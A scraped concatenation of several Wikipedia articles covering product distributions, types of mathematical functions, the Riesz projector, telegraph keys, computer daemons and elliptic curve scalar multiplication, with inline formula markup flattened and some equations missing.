The variableyi≡ri2{\displaystyle y_{i}\equiv r_{i}^{2}}is clearly Chi-squared with two degrees of freedom and has PDF
Wells et al.[13]show that the density function ofs≡|z1z2|{\displaystyle s\equiv |z_{1}z_{2}|}is
and the cumulative distribution function ofs{\displaystyle s}is
Thus the polar representation of the product of two uncorrelated complex Gaussian samples is
The first and second moments of this distribution can be found from the integral inNormal Distributionsabove
Thus its variance isVar(s)=m2−m12=4−π24{\displaystyle \operatorname {Var} (s)=m_{2}-m_{1}^{2}=4-{\frac {\pi ^{2}}{4}}}.
Further, the density ofz≡s2=|r1r2|2=|r1|2|r2|2=y1y2{\displaystyle z\equiv s^{2}={|r_{1}r_{2}|}^{2}={|r_{1}|}^{2}{|r_{2}|}^{2}=y_{1}y_{2}}corresponds to the product of two independent Chi-square samplesyi{\displaystyle y_{i}}each with two DoF. Writing these as scaled Gamma distributionsfy(yi)=1θΓ(1)e−yi/θwithθ=2{\displaystyle f_{y}(y_{i})={\tfrac {1}{\theta \Gamma (1)}}e^{-y_{i}/\theta }{\text{ with }}\theta =2}then, from the Gamma products below, the density of the product is
Letu1,v1,u2,v2,…,u2N,v2N,{\displaystyle u_{1},v_{1},u_{2},v_{2},\ldots ,u_{2N},v_{2N},}be4N{\displaystyle 4N}independent samples from a normal(0,1) distribution.Settingz1=u1+iv1,z2=u2+iv2,…,andz2N=u2N+iv2N,{\displaystyle z_{1}=u_{1}+iv_{1},z_{2}=u_{2}+iv_{2},\ldots ,{\text{ and }}z_{2N}=u_{2N}+iv_{2N},}thenz1,z2,…,z2N{\displaystyle z_{1},z_{2},\ldots ,z_{2N}}are independent zero-mean complex normal samples with circular symmetry.
Let ofs≡∑i=1Nz2i−1z2i{\displaystyle s\equiv \sum _{i=1}^{N}z_{2i-1}z_{2i}}, Heliot et al.[14]show that the joint density function of the real and imaginary parts ofs{\displaystyle s}, denotedsR{\displaystyle s_{\textrm {R}}}andsI{\displaystyle s_{\textrm {I}}}, respectively, is given by
psR,sI(sR,sI)=2(sR2+sI2)N−12πΓ(n)σsN+1Kn−1(2sR2+sI2σs),{\displaystyle p_{s_{\textrm {R}},s_{\textrm {I}}}(s_{\textrm {R}},s_{\textrm {I}})={\frac {2\left(s_{\textrm {R}}^{2}+s_{\textrm {I}}^{2}\right)^{\frac {N-1}{2}}}{\pi \Gamma (n)\sigma _{s}^{N+1}}}K_{n-1}\!\left(\!2{\frac {\sqrt {s_{\textrm {R}}^{2}+s_{\textrm {I}}^{2}}}{\sigma _{s}}}\right),}whereσs{\displaystyle \sigma _{s}}is the standard deviation ofs{\displaystyle s}. Note thatσs=1{\displaystyle \sigma _{s}=1}if all theui,vi{\displaystyle u_{i},v_{i}}variables are normal(0,1).
Besides, they also prove that the density function of the magnitude ofs{\displaystyle s},|s|{\displaystyle |s|}, is
p|s|(s)=4Γ(N)σsN+1sNKN−1(2sσs),{\displaystyle p_{|s|}(s)={\frac {4}{\Gamma (N)\sigma _{s}^{N+1}}}s^{N}K_{N-1}\left({\frac {2s}{\sigma _{s}}}\right),}wheres=sR2+sI2{\displaystyle s={\sqrt {s_{\textrm {R}}^{2}+s_{\textrm {I}}^{2}}}}.
The first moment of this distribution, i.e. the mean of|s|{\displaystyle |s|}, can be expressed as
E{|s|}=πσsΓ(N+12)2Γ(N),{\displaystyle E\{|s|\}={\sqrt {\pi }}\sigma _{s}{\frac {\Gamma (N+{\frac {1}{2}})}{2\Gamma (N)}},}which further simplifies asE{|s|}∼σsπN2,{\displaystyle E\{|s|\}\sim {\frac {\sigma _{s}{\sqrt {\pi N}}}{2}},}whenN{\displaystyle N}is asymptotically large (i.e.,N→∞{\displaystyle N\rightarrow \infty }) .
The product of non-central independent complex Gaussians is described by O’Donoughue and Moura[15]and forms a double infinite series ofmodified Bessel functionsof the first and second types.
The product of two independent Gamma samples,z=x1x2{\displaystyle z=x_{1}x_{2}}, definingΓ(x;ki,θi)=xki−1e−x/θiΓ(ki)θiki{\displaystyle \Gamma (x;k_{i},\theta _{i})={\frac {x^{k_{i}-1}e^{-x/\theta _{i}}}{\Gamma (k_{i})\theta _{i}^{k_{i}}}}}, follows[16]
Nagar et al.[17]define a correlated bivariate beta distribution
where
Then the pdf ofZ=XYis given by
where2F1{\displaystyle {_{2}F_{1}}}is the Gauss hypergeometric function defined by the Euler integral
Note that multivariate distributions are not generally unique, apart from the Gaussian case, and there may be alternatives.
The distribution of the product of a random variable having auniform distributionon (0,1) with a random variable having agamma distributionwith shape parameter equal to 2, is anexponential distribution.[18]A more general case of this concerns the distribution of the product of a random variable having abeta distributionwith a random variable having agamma distribution: for some cases where the parameters of the two component distributions are related in a certain way, the result is again a gamma distribution but with a changed shape parameter.[18]
TheK-distributionis an example of a non-standard distribution that can be defined as a product distribution (where both components have a gamma distribution).
The product ofnGamma andmPareto independent samples was derived by Nadarajah.[19]
|
https://en.wikipedia.org/wiki/Product_distribution#expectation
|
Inmathematics,functionscan be identified according to the properties they have. These properties describe the functions' behaviour under certain conditions. A parabola is a specific type of function.
These properties concern thedomain, thecodomainand theimageof functions.
These properties concern how the function is affected byarithmeticoperations on its argument.
The following are special examples of ahomomorphismon abinary operation:
Relative tonegation:
Relative to a binary operation and anorder:
Relative to topology and order:
Relative to measure and topology:
In general, functions are often defined by specifying the name of a dependent variable, and a way of calculating what it should map to. For this purpose, the↦{\displaystyle \mapsto }symbol orChurch'sλ{\displaystyle \lambda }is often used. Also, sometimes mathematicians notate a function'sdomainandcodomainby writing e.g.f:A→B{\displaystyle f:A\rightarrow B}. These notions extend directly tolambda calculusandtype theory, respectively.
These are functions that operate on functions or produce other functions; seeHigher order function.
Examples are:
Category theoryis a branch of mathematics that formalizes the notion of a special function via arrows ormorphisms. Acategoryis an algebraic object that (abstractly) consists of a class ofobjects, and for every pair of objects, a set ofmorphisms. A partial (equiv.dependently typed) binary operation calledcompositionis provided on morphisms, every object has one special morphism from it to itself called theidentityon that object, and composition and identities are required to obey certain relations.
In a so-calledconcrete category, the objects are associated with mathematical structures likesets,magmas,groups,rings,topological spaces,vector spaces,metric spaces,partial orders,differentiable manifolds,uniform spaces, etc., and morphisms between two objects are associated withstructure-preserving functionsbetween them. In the examples above, these would befunctions, magmahomomorphisms,group homomorphisms,ring homomorphisms,continuous functions,linear transformations(ormatrices),metric maps,monotonic functions,differentiable functions, anduniformly continuousfunctions, respectively.
As an algebraic theory, one of the advantages of category theory is to enable one to prove many general results with a minimum of assumptions. Many common notions from mathematics (e.g.surjective,injective,free object,basis, finiterepresentation,isomorphism) are definable purely in category theoretic terms (cf.monomorphism,epimorphism).
Category theory has been suggested as a foundation for mathematics on par withset theoryandtype theory(cf.topos).
Allegory theory[1]provides a generalization comparable to category theory forrelationsinstead of functions.
|
https://en.wikipedia.org/wiki/List_of_types_of_functions
|
Inmathematics, or more specifically inspectral theory, theRiesz projectoris the projector onto the eigenspace corresponding to a particulareigenvalueof an operator (or, more generally, a projector onto aninvariant subspacecorresponding to an isolated part of the spectrum). It was introduced byFrigyes Rieszin 1912.[1][2]
LetA{\displaystyle A}be aclosed linear operatorin the Banach spaceB{\displaystyle {\mathfrak {B}}}. LetΓ{\displaystyle \Gamma }be a simple or composite rectifiable contour, which encloses some regionGΓ{\displaystyle G_{\Gamma }}and lies entirely within theresolvent setρ(A){\displaystyle \rho (A)}(Γ⊂ρ(A){\displaystyle \Gamma \subset \rho (A)}) of the operatorA{\displaystyle A}. Assuming that the contourΓ{\displaystyle \Gamma }has a positive orientation with respect to the regionGΓ{\displaystyle G_{\Gamma }}, the Riesz projector corresponding toΓ{\displaystyle \Gamma }is defined by
hereIB{\displaystyle I_{\mathfrak {B}}}is theidentity operatorinB{\displaystyle {\mathfrak {B}}}.
Ifλ∈σ(A){\displaystyle \lambda \in \sigma (A)}is the only point of the spectrum ofA{\displaystyle A}inGΓ{\displaystyle G_{\Gamma }}, thenPΓ{\displaystyle P_{\Gamma }}is denoted byPλ{\displaystyle P_{\lambda }}.
The operatorPΓ{\displaystyle P_{\Gamma }}is a projector which commutes withA{\displaystyle A}, and hence in the decomposition
both termsLΓ{\displaystyle {\mathfrak {L}}_{\Gamma }}andNΓ{\displaystyle {\mathfrak {N}}_{\Gamma }}areinvariant subspacesof the operatorA{\displaystyle A}.
Moreover,
IfΓ1{\displaystyle \Gamma _{1}}andΓ2{\displaystyle \Gamma _{2}}are two different contours having the properties indicated above, and the regionsGΓ1{\displaystyle G_{\Gamma _{1}}}andGΓ2{\displaystyle G_{\Gamma _{2}}}have no points in common, then the projectors corresponding to them are mutually orthogonal:
|
https://en.wikipedia.org/wiki/Riesz_projector
|
Atelegraph key,clacker,tapperormorse keyis a specialized electricalswitchused by a trained operator to transmit text messages inMorse codein atelegraphysystem.[1]Keys are used in all forms ofelectrical telegraphsystems, including landline (also called wire) telegraphy andradio (also called wireless) telegraphy. An operator uses the telegraph key to send electrical pulses (or in the case of modernCW, unmodulated radio waves) of two different lengths: short pulses, calleddotsordits, and longer pulses, calleddashesordahs. These pulses encode the letters and other characters that spell out the message.
The first telegraph key was invented byAlfred Vail, an associate ofSamuel Morse.[2]Since then the technology has evolved and improved, resulting in a range of key designs.[3]
Astraight keyis the common telegraph key as seen in various movies. It is a simple bar with a knob on top and an electrical contact underneath. When the bar is pressed down against spring tension, it makes a closed electric circuit.[4]Traditionally, American telegraph keys had flat topped knobs and narrow bars (frequently curved), while European telegraph keys had ball shaped knobs and thick bars. This appears to be purely a matter of culture and training, but the users of each are tremendously partisan.[a]
Straight keys have been made in numerous variations for over 150 years and in numerous countries. They are the subject of an avid community of key collectors. The straight keys also had ashorting barthat closed the electrical circuit through the station when the operator was not actively sending messages. The shorting switch for an unused key was needed in telegraph systems wired in the style of North American railroads, in which the signal power was supplied from batteries only in telegraph offices at one or both ends of a line, rather than each station having its own bank of batteries, which was often used in Europe. The shorting bar completed the electrical path to the next station and all following stations, so that their sounders could respond to signals coming down the line, allowing the operator in the next town to receive a message from the central office. Although occasionally included in later keys for reasons of tradition, the shorting bar is unnecessary for radio telegraphy, except as a convenience to produce a steady signal for tuning the transmitter.
The straight key is simple and reliable, but the rapid pumping action needed to send a string of dots (orditsas most operators call them) poses some medically significant drawbacks.
Transmission speeds vary from 5 words (25 characters) per minute, by novice operators, up to about 30 words (150 characters) per minute by skilled operators. In the early days of telegraphy, a number of professional telegraphers developed arepetitive stress injuryknown asglass armortelegraphers’ paralysis.[5]"Glass arm" may be reduced or eliminated by increasing the side play of the straight key, by loosening the adjustabletrunnionscrews. Such problems can be avoided either by using good manual technique, or by only using side-to-side key types.[6][7][8]
In addition to the basic up-and-down telegraph key, telegraphers have been experimenting with alternate key designs from the beginning of telegraphy. Many are made to move side-to-side instead of up-and-down. Some of the designs, such assideswipers(orbushwhackers) andsemi-automatickeys operate mechanically.
Beginning in the mid-20th century electronic devices calledkeyershave been developed, which are operated by special keys of various designs generally categorized assingle-paddlekeys (also calledsideswipers), anddouble-paddlekeys (or "iambic"[b]or "squeeze" keys). The keyer may be either an independent device that attaches to the transmitter in place of a telegraph key, or circuitry incorporated in modern amateurs' radios.
The first widely accepted alternative key was thesideswiperorsidewinder, sometimes called acootie keyorbushwhacker. This key uses a side-to-side action with contacts on both the left and right and the arm spring-loaded to return to center; the operator may make aditordahby swinging the lever in either direction. A series ofditscan be sent by rocking the arm back and forth.
This first new style of key was introduced in part to increase speed of sending, but more importantly to reduce therepetitive strain injurywhich telegraphers called "glass arm". The side-to-side motion reduces strain, and uses different muscles than the up-and-down motion (called "pounding brass"). Nearly all advanced keys use some form of side-to-side action.
The alternating action produces a distinctive rhythm orswingwhich noticeably affects the operator's transmission rhythm (known asfist). Although the original sideswiper is now rarely seen or used, when the left and right contacts are electrically separated a sideswiper becomes a modern single-paddle key (see below); likewise, a modern single-lever key becomes an old-style sideswiper when its two contacts are wired together.
A popular side-to-side key is the semi-automatic key or "bug", sometimes known as aVibroplexkey after an early manufacturer of mechanical, semi-automatic keys. The original bugs were fully mechanical, based on a kind of simple clockwork mechanism, and required no electronic keyer. A skilled operator can achieve sending speeds in excess of 40 words per minute with a bug.
The benefit of the clockwork mechanism is that it reduces the motion required from the telegrapher's hand, which provides greater speed of sending, and it produces uniformly timeddits(dots, or short pulses) and maintains constant rhythm; consistent timing and rhythm are crucial for decoding the signal on the other end of the telegraph line.
The single paddle is held between the knuckle and the thumb of the right hand. When the paddle is pressed to the right (with the thumb), it kicks a horizontalpendulumwhich then rocks against the contact point, sending a series of short pulses (ditsor dots) at a speed which is controlled by the pendulum’s length. When the paddle is pressed toward the left (with the knuckle) it makes a continuous contact suitable for sendingdahs(dashes); the telegrapher remains responsible for timing thedahsto proportionally match thedits. The clockwork pendulum needs the extra kick that the stronger thumb press provides, which established the standard left-right paddle directions for thedit-dahassignments that persists on the paddles on 21st century electronic keys. A few semi-automatic keys were made with mirror-image mechanisms for left-handed telegraphers.
Like semi-automatic keys, the telegrapher operates anelectronic keyerby tapping a paddle key, swinging its lever(s) from side-to-side. When pressed to one side (usually left), the keyer electronics generate a series ofdahs; when pressed to the other side (usually right), a series ofdits. Keyers work with two different types of keys: Single paddle and double paddle keys.
Like semi-automatic keys, pressing the paddle on one side produces aditand the other adah. Single paddle keys are also calledsingle lever keysorsideswipers, the same name as the older side-to-side key design they greatly resemble. Double paddle keys are also called "iambic" keys[b]or "squeeze" keys. Also like the old semi-automatic keys, the conventional assignment of the paddle directions (for a right-handed telegrapher) is that pressing a paddle with the right thumb (pressing the single paddle rightward, or for a double-paddle key, pressing the left paddle with the thumb, rightwards towards the center) creates a series ofdits. Pressing a paddle with the right knuckle (hence swinging a single paddle leftward, or the right paddle on a double-paddle key leftward to the center) creates a series ofdahs. Left-handed telegraphers sometimes elect to reverse the electrical contacts, so their left-handed keying is a mirror image of standard right-handed keying.
Single paddle keys are essentially the same as the original sideswiper keys, with the left and right electrical contacts wired separately. Double-paddle keys have one arm for each of the two contacts, each arm held away from the common center by a spring; pressing either of the paddles towards the center makes contact, the same as pressing a single-lever key to one side. For double-paddle keys wired to an "iambic" keyer, squeezing both paddles together makes a double-contact, which causes the keyer to send alternatingditsanddahs(ordahsanddits, depending on which lever makes first contact).
Mostelectronic keyersincludedot and dash memoryfunctions, so the operator does not need to use perfect spacing betweenditsanddahsor vice versa. Withditordahmemory, the operator's keying action can be about oneditahead of the actual transmission. The electronics in the keyer adjusts the timing so that the output of each letter is machine-perfect. Electronic keyers allow very high speed transmission of code.
Using akeyerin "iambic" mode requires a key with two paddles: One paddle producesdits and the other producesdahs. Pressing both at the same time (a "squeeze") produces an alternatingdit-dah-dit-dah(▄ ▄▄▄ ▄ ▄▄▄ ▄ ▄▄▄) sequence, which starts with aditif theditside makes contact first, or adah(▄▄▄ ▄ ▄▄▄ ▄ ▄▄▄ ▄) if thedahside connects first.
An additional advantage of electronic keyers over semiautomatic keys is that code speed is easily changed with electronic keyers, just by turning a knob. With a semiautomatic key, the location of the pendulum weight and the pendulum spring tension and contact must all be repositioned and rebalanced to change theditspeed.[9]
Keys having two separate levers, one forditsand the other fordahsare called dual or dual-lever paddles. With a dual paddle both contacts may be closed simultaneously, enabling the "iambic"[b]functions of an electronic keyer that is designed to support them: By pressing both paddles (squeezing the levers together) the operator can create a series of alternatingditsanddahs, analogous to a sequence ofiambs in poetry.[10][11]For that reason, dual paddles are sometimes calledsqueeze keysoriambic keys. Typical dual-paddle keys' levers move horizontally, like the earlier single-paddle keys, as opposed to how the original "straight-keys'" arms move up-and-down.
Whether the sequence begins with aditor adahis determined by which lever makes contact first: If thedahlever is closed first, then the first element will be adah, so the string of elements will be similar to a sequence oftrocheesin poetry, and the method could logically just as well be called"trochaic keying"(▄▄▄ ▄ ▄▄▄ ▄ ▄▄▄ ▄ ▄▄▄). If theditlever makes first contact, then the string begins with adit(▄ ▄▄▄ ▄ ▄▄▄ ▄ ▄▄▄ ▄).
Insofar as iambic[b]keying is a function of the electronic keyer, it is not correct, technically, to refer to a dual paddle keyitselfas "iambic", although this is commonly done in marketing. A dual paddle key is required for iambic sending, which also requires an iambic keyer. But any single- or dual-paddle key can be used non-iambicly, without squeezing, and there were electronic keyers made which did not have iambic functions.
Iambic keying or squeeze keying reduces the key strokes or hand movements necessary to make some characters, e.g. the letter C, which can be sent by merely squeezing the two paddles together. With a single-paddle or non-iambic keyer, the hand motion would require alternating four times forC(dah-dit-dah-dit▄▄▄ ▄ ▄▄▄ ▄).
The efficiency of iambic keying has recently been discussed in terms of movements per character and timings for high speed CW, with the author concluding that the timing difficulties of correctly operating a keyer iambicly at high speed outweigh any small benefits.[12]
Iambic keyers function in one of at least two major modes: ModeAand modeB. There is a third, rarely available modeU.
ModeAis the original iambic mode, in which alternate dots and dashes are produced as long as both paddles are depressed. ModeAis essentially "what you hear is what you get": When the paddles are released, the keying stops with the last dot or dash that was being sent while the paddles were held.
ModeBis the second mode, which devolved from a logic error in an early iambic keyer.[citation needed]Over the years iambic modeBhas become something of a standard and is the default setting in most keyers.
In modeB, dots and dashes are produced as long as both paddles are depressed. When the paddles are released, the keying continues by sendingone more elementthan has already been heard. I.e., if the paddles were released during adahthen the last element sent will be a followingdit; if the paddles were released during aditthen the sequence will end with the followingdah.
Users accustomed to one mode may find it difficult to adapt to the other, so most modern keyers allow selection of the desired mode.
A third electronic keyer mode useful with a dual paddle is the "Ultimatic" mode (modeU), so-called for the brand name of the electronic keyer that introduced it. In the Ultimatic keying mode, the keyer will switch to the opposite element if the second lever is pressed before the first is released (that is, squeezed).
A single-lever paddle key has separate contacts forditsanddahs, but there is no ability to make both contacts simultaneously by squeezing the paddles together for iambic mode.
When a single-paddle key is used with an electronic keyer, continuousditsare created by holding thedit-side paddle (▄ ▄ ▄ ▄ ▄ ▄ ▄ ▄...); likewise, continuousdahsare created by holding thedahpaddle (▄▄▄ ▄▄▄ ▄▄▄ ▄▄▄ ▄▄▄...).
A single-paddle key cannon-iambicly operateanyelectronic keyer, whether or not it even offers iambic functions, and regardless of whether the keyer iambically operates in modeA,B, orU.
Simple telegraph-like keys were long used to control the flow of electricity in laboratory tests of electrical circuits. Often, these were simple "strap" keys, in which a bend in the key lever provided the key's spring action.
Telegraph-like keys were once used in the study ofoperant conditioningwithpigeons. Starting in the 1940s, initiated byB. F. SkinneratHarvard University, the keys were mounted vertically behind a small circular hole about the height of a pigeon's beak in the front wall of anoperant conditioning chamber. Electromechanical recording equipment detected the closing of the switch whenever the pigeon pecked the key. Depending on the psychological questions being investigated, keypecks might have resulted in the presentation of food or other stimuli.
With straight keys, side-swipers, and, to an extent, bugs, each and every telegrapher has their own unique style or rhythm pattern when transmitting a message. An operator's style is known as their "fist".
Since every fist is unique, other telegraphers can usually identify the individual telegrapher transmitting a particular message. This had a huge significance during the first and second World Wars, since the on-board telegrapher's fist could be used to track individual ships and submarines, and fortraffic analysis.
However, with electronic keyers (either single- or double-paddle) this is no longer the case: Keyers produce uniformly "perfect" code at a set speed, which is altered at the request of the receiver, usually not the sender. Only inter-character and inter-word spacing remain unique to the operator, and can produce a less clear semblance of a fist.
|
https://en.wikipedia.org/wiki/Telegraph_key
|
Inmultitaskingcomputeroperating systems, adaemon(/ˈdiːmən/or/ˈdeɪmən/)[1]is acomputer programthat runs as abackground process, rather than being under the direct control of an interactive user. Traditionally, the process names of a daemon end with the letterd, for clarification that the process is in fact a daemon, and for differentiation between a daemon and a normal computer program. For example,syslogdis a daemon that implements system logging facility, andsshdis a daemon that serves incomingSSHconnections.
In aUnixenvironment, theparent processof a daemon is often, but not always, theinitprocess. A daemon is usually created either by a processforkinga child process and then immediately exiting, thus causing init to adopt the child process, or by the init process directly launching the daemon. In addition, a daemon launched by forking and exiting typically must perform other operations, such as dissociating the process from any controllingterminal(tty). Such procedures are often implemented in various convenience routines such asdaemon(3)in Unix.
Systems often start daemons atboottime that will respond to network requests, hardware activity, or other programs by performing some task. Daemons such ascronmay also perform defined tasks at scheduled times.
The term was coined by the programmers atMIT's Project MAC. According toFernando J. Corbató, who worked onProject MACaround 1963, his team was the first to use the term daemon, inspired byMaxwell's demon, an imaginary agent in physics andthermodynamicsthat helped to sort molecules, stating, "We fancifully began to use the word daemon to describe background processes that worked tirelessly to perform system chores".[2]Unixsystems inherited this terminology. Maxwell's demon is consistent with Greek mythology's interpretation of adaemonas a supernatural being working in the background.
In the general sense, daemon is an older form of the word "demon", from theGreekδαίμων. In theUnix System Administration HandbookEvi Nemethstates the following about daemons:[3]
Many people equate the word "daemon" with the word "demon", implying some kind ofsatanicconnection between UNIX and theunderworld. This is an egregious misunderstanding. "Daemon" is actually a much older form of "demon"; daemons have no particular bias towards good or evil, but rather serve to help define a person's character or personality. Theancient Greeks' concept of a "personal daemon" was similar to the modern concept of a "guardian angel"—eudaemoniais the state of being helped or protected by a kindly spirit. As a rule, UNIX systems seem to be infested with both daemons and demons.
In modern usage in the context of computer software, the worddaemonis pronounced/ˈdiːmən/DEE-mənor/ˈdeɪmən/DAY-mən.[1]
Alternative terms fordaemonareservice(used in Windows, from Windows NT onwards, and later also in Linux),started task(IBMz/OS),[4]andghost job(XDSUTS). Sometimes the more general termserverorserver processis used, particularly for daemons that operate as part ofclient-server systems.[5]
After the term was adopted for computer use, it was rationalized as abackronymfor Disk And Execution MONitor.[6][1]
Daemons that connect to a computer network are examples ofnetwork services.
In a strictly technical sense, a Unix-like system process is a daemon when its parent process terminates and the daemon is assigned theinitprocess (process number 1) as its parent process and has no controlling terminal. However, more generally, a daemon may be any background process, whether a child of the init process or not.
On a Unix-like system, the common method for a process to become a daemon, when the process is started from thecommand lineor from a startup script such as aninitscript or aSystemStarterscript, involves:
If the process is started by asuper-serverdaemon, such asinetd,launchd, orsystemd, the super-server daemon will perform those functions for the process,[7][8][9]except for old-style daemons not converted to run undersystemdand specified asType=forking[9]and "multi-threaded" datagram servers underinetd.[7]
In theMicrosoft DOSenvironment, daemon-like programs were implemented asterminate-and-stay-resident programs(TSR).
OnMicrosoft Windows NTsystems, programs calledWindows servicesperform the functions of daemons. They run as processes, usually do not interact with the monitor, keyboard, and mouse, and may be launched by the operating system at boot time. InWindows 2000and later versions, Windows services are configured and manually started and stopped using theControl Panel, a dedicated control/configuration program, the Service Controller component of theService Control Manager(sccommand), thenet startandnet stopcommands or thePowerShellscripting system.
However, any Windows application can perform the role of a daemon, not just a service, and some Windows daemons have the option of running as a normal process.
On theclassic Mac OS, optional features and services were provided by files loaded at startup time that patched the operating system; these were known assystem extensionsandcontrol panels. Later versions of classic Mac OS augmented these with fully fledgedfaceless background applications: regular applications that ran in the background. To the user, these were still described as regular system extensions.
macOS, which is aUnixsystem, uses daemons but uses the term "services" to designate software that performs functions selected from theServices menu, rather than using that term for daemons, as Windows does.
|
https://en.wikipedia.org/wiki/Daemon_(computer_software)
|
Elliptic curve scalar multiplicationis the operation of successively adding a point along anelliptic curveto itself repeatedly. It is used inelliptic curve cryptography(ECC).
The literature presents this operation asscalar multiplication, as written inHessian form of an elliptic curve. A widespread name for this operation is alsoelliptic curve point multiplication, but this can convey the wrong impression of being a multiplication between two points.
Given a curve,E, defined by some equation in afinite field(such asE:y2=x3+ax+b), point multiplication is defined as the repeated addition of a point along that curve. Denote asnP=P+P+P+ … +Pfor some scalar (integer)nand a pointP= (x,y)that lies on the curve,E. This type of curve is known as a Weierstrass curve.
The security of modern ECC depends on the intractability of determiningnfromQ=nPgiven known values ofQandPifnis large (known as theelliptic curve discrete logarithmproblem by analogy to othercryptographic systems). This is because the addition of two points on an elliptic curve (or the addition of one point to itself) yields a third point on the elliptic curve whose location has no immediately obvious relationship to the locations of the first two, and repeating this many times over yields a pointnPthat may be essentially anywhere. Intuitively, this is not dissimilar to the fact that if you had a pointPon a circle, adding 42.57 degrees to its angle may still be a point "not too far" fromP, but adding 1000 or 1001 times 42.57 degrees will yield a point that requires a bit more complex calculation to find the original angle. Reversing this process, i.e., givenQ=nPandP, and determiningn, can only be done by trying out all possiblen—an effort that is computationally intractable ifnis large.
There are three commonly defined operations for elliptic curve points: addition, doubling and negation.
Point at infinityO{\displaystyle {\mathcal {O}}}is theidentity elementof elliptic curve arithmetic. Adding it to any point results in that other point, including adding point at infinity to itself.
That is:
Point at infinity is also written as0.
Point negation is finding such a point, that adding it to itself will result in point at infinity (O{\displaystyle {\mathcal {O}}}).
For elliptic curves of the formE:y2=x3+ax+b, negation is a point with the samexcoordinate but negatedycoordinate:
With 2 distinct points,PandQ, addition is defined as the negation of the point resulting from the intersection of the curve,E, and the straight line defined by the pointsPandQ, giving the point,R.[1]
Assuming the elliptic curve,E, is given byy2=x3+ax+b, this can be calculated as:
These equations are correct when neither point is the point at infinity,O{\displaystyle {\mathcal {O}}}, and if the points have different x coordinates (they're not mutual inverses). This is important for theECDSA verification algorithmwhere the hash value could be zero.
Where the pointsPandQare coincident (at the same coordinates), addition is similar, except that there is no well-defined straight line throughP, so the operation is closed using a limiting case, the tangent to the curve,E, atP.
This is calculated as above, taking derivatives (dE/dx)/(dE/dy):[1]
whereais from the defining equation of the curve,E, above.
The straightforward way of computing a point multiplication is through repeated addition. However, there are more efficient approaches to computing the multiplication.
The simplest method is the double-and-add method,[2]similar tosquare-and-multiplyin modular exponentiation. The algorithm works as follows:
To computesP, start with the binary representation fors:s=s0+2s1+22s2+⋯+2n−1sn−1{\displaystyle s=s_{0}+2s_{1}+2^{2}s_{2}+\cdots +2^{n-1}s_{n-1}}, wheres0..sn−1∈{0,1},n=⌈log2s⌉{\displaystyle s_{0}~..~s_{n-1}\in \{0,1\},n=\lceil \log _{2}{s}\rceil }.
eA
Note that both of the iterative methods above are vulnerable to timing analysis. See Montgomery Ladder below for an alternative approach.
wherefis the function for multiplying,Pis the coordinate to multiply,dis the number of times to add the coordinate to itself. Example:100Pcan be written as2(2[P + 2(2[2(P + 2P)])])and thus requires six point double operations and two point addition operations.100Pwould be equal tof(P, 100).
This algorithm requires log2(d) iterations of point doubling and addition to compute the full point multiplication. There are many variations of this algorithm such as using a window, sliding window, NAF, NAF-w, vector chains, and Montgomery ladder.
In the windowed version of this algorithm,[2]one selects a window sizewand computes all2w{\displaystyle 2^{w}}values ofdP{\displaystyle dP}ford=0,1,2,…,2w−1{\displaystyle d=0,1,2,\dots ,2^{w}-1}. The algorithm now uses the representationd=d0+2wd1+22wd2+⋯+2mwdm{\displaystyle d=d_{0}+2^{w}d_{1}+2^{2w}d_{2}+\cdots +2^{mw}d_{m}}and becomes
This algorithm has the same complexity as the double-and-add approach with the benefit of using fewer point additions (which in practice are slower than doubling). Typically, the value ofwis chosen to be fairly small making thepre-computationstage a trivial component of the algorithm. For the NIST recommended curves,w=4{\displaystyle w=4}is usually the best selection. The entire complexity for an-bit number is measured asn+1{\displaystyle n+1}point doubles and2w−2+nw{\displaystyle 2^{w}-2+{\tfrac {n}{w}}}point additions.
In the sliding-window version, we look to trade off point additions for point doubles. We compute a similar table as in the windowed version except we only compute the pointsdP{\displaystyle dP}ford=2w−1,2w−1+1,…,2w−1{\displaystyle d=2^{w-1},2^{w-1}+1,\dots ,2^{w}-1}. Effectively, we are only computing the values for which the most significant bit of the window is set. The algorithm then uses the original double-and-add representation ofd=d0+2d1+22d2+⋯+2mdm{\displaystyle d=d_{0}+2d_{1}+2^{2}d_{2}+\cdots +2^{m}d_{m}}.
This algorithm has the benefit that the pre-computation stage is roughly half as complex as the normal windowed method while also trading slower point additions for point doublings. In effect, there is little reason to use the windowed method over this approach, except that the former can be implemented in constant time. The algorithm requiresw−1+n{\displaystyle w-1+n}point doubles and at most2w−1−1+nw{\displaystyle 2^{w-1}-1+{\tfrac {n}{w}}}point additions.
In thenon-adjacent formwe aim to make use of the fact that point subtraction is just as easy as point addition to perform fewer (of either) as compared to a sliding-window method. The NAF of the multiplicandd{\displaystyle d}must be computed first with the following algorithm
Where the signed modulo functionmodsis defined as
This produces the NAF needed to now perform the multiplication. This algorithm requires the pre-computation of the points{1,3,5,…,2w−1−1}P{\displaystyle \lbrace 1,3,5,\dots ,2^{w-1}-1\rbrace P}and their negatives, whereP{\displaystyle P}is the point to be multiplied. On typical Weierstrass curves, ifP={x,y}{\displaystyle P=\lbrace x,y\rbrace }then−P={x,−y}{\displaystyle -P=\lbrace x,-y\rbrace }. So in essence the negatives are cheap to compute. Next, the following algorithm computes the multiplicationdP{\displaystyle dP}:
The wNAF guarantees that on average there will be a density of1w+1{\displaystyle {\tfrac {1}{w+1}}}point additions (slightly better than the unsigned window). It requires 1 point doubling and2w−2−1{\displaystyle 2^{w-2}-1}point additions for precomputation. The algorithm then requiresn{\displaystyle n}point doublings andnw+1{\displaystyle {\tfrac {n}{w+1}}}point additions for the rest of the multiplication.
One property of the NAF is that we are guaranteed that every non-zero elementdi{\displaystyle d_{i}}is followed by at leastw−1{\displaystyle w-1}additional zeroes. This is because the algorithm clears out the lowerw{\displaystyle w}bits ofd{\displaystyle d}with every subtraction of the output of themodsfunction. This observation can be used for several purposes. After every non-zero element the additional zeroes can be implied and do not need to be stored. Secondly, the multiple serial divisions by 2 can be replaced by a division by2w{\displaystyle 2^{w}}after every non-zerodi{\displaystyle d_{i}}element and divide by 2 after every zero.
It has been shown that through application of a FLUSH+RELOAD side-channel attack onOpenSSL, the full private key can be revealed after performing cache-timing against as few as 200 signatures performed.[3]
The Montgomery ladder[4]approach computes the point multiplication in afixednumber of operations. This can be beneficial when timing, power consumption, or branch measurements are exposed to an attacker performing aside-channel attack. The algorithm uses the same representation as from double-and-add.
This algorithm has in effect the same speed as the double-and-add approach except that it computes the same number of point additions and doubles regardless of the value of the multiplicandd. This means that at this level the algorithm does not leak any information through branches or power consumption.
However, it has been shown that through application of a FLUSH+RELOAD side-channel attack on OpenSSL, the full private key can be revealed after performing cache-timing against only one signature at a very low cost.[5]
